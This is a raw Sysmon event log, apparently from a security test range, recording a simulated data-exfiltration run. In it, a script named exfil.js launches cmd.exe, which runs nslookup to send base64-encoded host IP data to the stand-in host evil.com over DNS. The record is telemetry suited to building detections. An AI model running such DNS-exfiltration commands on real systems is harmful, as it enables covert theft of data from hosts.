14:21:52.606{2E1864BB-1900-629A-8146-000000005F02}72565700C:\Windows\system32\cmd.exe{2E1864BB-1900-629A-8346-000000005F02}4712C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216040Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.615{2E1864BB-1900-629A-8346-000000005F02}4712C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1900-629A-8146-000000005F02}7256C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcqn.tmp 2>&1 10341000x8000000000000000216039Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.553{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1900-629A-8246-000000005F02}5380C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216038Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.553{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1900-629A-8246-000000005F02}5380C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216037Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.553{2E1864BB-1900-629A-8246-000000005F02}53805176C:\Windows\system32\conhost.exe{2E1864BB-1900-629A-8146-000000005F02}7256C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216036Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.505{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1900-629A-8246-000000005F02}5380C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216035Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.505{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216034Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.505{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216033Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.505{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216032Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.505{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216031Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.505{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1900-629A-8146-000000005F02}7256C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216030Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.505{2E1864BB-18E0-629A-6742-000000005F02}39767868C:\Windows\System32\WScript.exe{2E1864BB-1900-629A-8146-000000005F02}7256C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216029Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.506{2E1864BB-1900-629A-8146-000000005F02}7256C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcqn.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000216028Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.501{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldushg.tmpMD5=E9933BFC1563034EF92711FFD1FA59E4,SHA256=B289486696E542D49274648AF69BCDC051FA9206A6157EC32F57F8442A56EBEC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216027Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.437{2E1864BB-1900-629A-7F46-000000005F02}60126220C:\Windows\system32\conhost.exe{2E1864BB-1900-629A-8046-000000005F02}5440C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216026Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.437{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216025Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.437{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216024Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.437{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216023Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.437{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216022Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.437{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1900-629A-8046-000000005F02}5440C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216021Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.437{2E1864BB-1900-629A-7E46-000000005F02}16762388C:\Windows\system32\cmd.exe{2E1864BB-1900-629A-8046-000000005F02}5440C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216020Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.442{2E1864BB-1900-629A-8046-000000005F02}5440C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1900-629A-7E46-000000005F02}1676C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldushg.tmp 2>&1 354300x8000000000000000216019Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.795{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51345- 354300x8000000000000000216018Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.795{00000000-0000-0000-0000-000000000000}8156<unknown process>-udptruefalse127.0.0.1-51345-false127.0.0.1-53domain 354300x8000000000000000216017Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.794{00000000-0000-0000-0000-000000000000}8156<unknown process>-udpfalsefalse127.0.0.1-51344-false127.0.0.1-53domain 354300x8000000000000000216016Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.794{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51344- 354300x8000000000000000216015Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.794{00000000-0000-0000-0000-000000000000}8156<unknown process>-udptruefalse127.0.0.1-51344-false127.0.0.1-53domain 354300x8000000000000000216014Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.794{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51343- 354300x8000000000000000216013Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.794{00000000-0000-0000-0000-000000000000}8156<unknown process>-udptruefalse127.0.0.1-51343-false127.0.0.1-53domain 354300x8000000000000000216012Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.711{00000000-0000-0000-0000-000000000000}7540<unknown process>-udpfalsefalse127.0.0.1-51342-false127.0.0.1-53domain 354300x8000000000000000216011Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.711{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51342- 354300x8000000000000000216010Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.711{00000000-0000-0000-0000-000000000000}7540<unknown process>-udptruefalse127.0.0.1-51342-false127.0.0.1-53domain 354300x8000000000000000216009Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.710{00000000-0000-0000-0000-000000000000}7540<unknown process>-udpfalsefalse127.0.0.1-51341-false127.0.0.1-53domain 354300x8000000000000000216008Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.710{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51341- 354300x8000000000000000216007Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.710{00000000-0000-0000-0000-000000000000}7540<unknown process>-udptruefalse127.0.0.1-51341-false127.0.0.1-53domain 354300x8000000000000000216006Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.710{00000000-0000-0000-0000-000000000000}7540<unknown process>-udpfalsefalse127.0.0.1-51340-false127.0.0.1-53domain 354300x8000000000000000216005Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.710{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51340- 354300x8000000000000000216004Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.710{00000000-0000-0000-0000-000000000000}7540<unknown process>-udptruefalse127.0.0.1-51340-false127.0.0.1-53domain 354300x8000000000000000216003Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.632{00000000-0000-0000-0000-000000000000}6000<unknown process>-udpfalsefalse127.0.0.1-51339-false127.0.0.1-53domain 354300x8000000000000000216002Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.632{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51339- 354300x8000000000000000216001Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.632{00000000-0000-0000-0000-000000000000}6000<unknown process>-udptruefalse127.0.0.1-51339-false127.0.0.1-53domain 354300x8000000000000000216000Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.632{00000000-0000-0000-0000-000000000000}6000<unknown process>-udpfalsefalse127.0.0.1-51338-false127.0.0.1-53domain 354300x8000000000000000215999Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.632{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51338- 354300x8000000000000000215998Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.632{00000000-0000-0000-0000-000000000000}6000<unknown process>-udptruefalse127.0.0.1-51338-false127.0.0.1-53domain 354300x8000000000000000215997Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.632{00000000-0000-0000-0000-000000000000}6000<unknown process>-udpfalsefalse127.0.0.1-51337-false127.0.0.1-53domain 354300x8000000000000000215996Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.631{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51337- 10341000x8000000000000000215995Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.337{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1900-629A-7F46-000000005F02}6012C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000215994Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.631{00000000-0000-0000-0000-000000000000}6000<unknown process>-udptruefalse127.0.0.1-51337-false127.0.0.1-53domain 10341000x8000000000000000215993Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.337{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1900-629A-7F46-000000005F02}6012C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000215992Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.557{00000000-0000-0000-0000-000000000000}7944<unknown process>-udpfalsefalse127.0.0.1-51336-false127.0.0.1-53domain 354300x8000000000000000215991Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.557{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51336- 354300x8000000000000000215990Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.556{00000000-0000-0000-0000-000000000000}7944<unknown process>-udpfalsefalse127.0.0.1-51335-false127.0.0.1-53domain 354300x8000000000000000215989Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 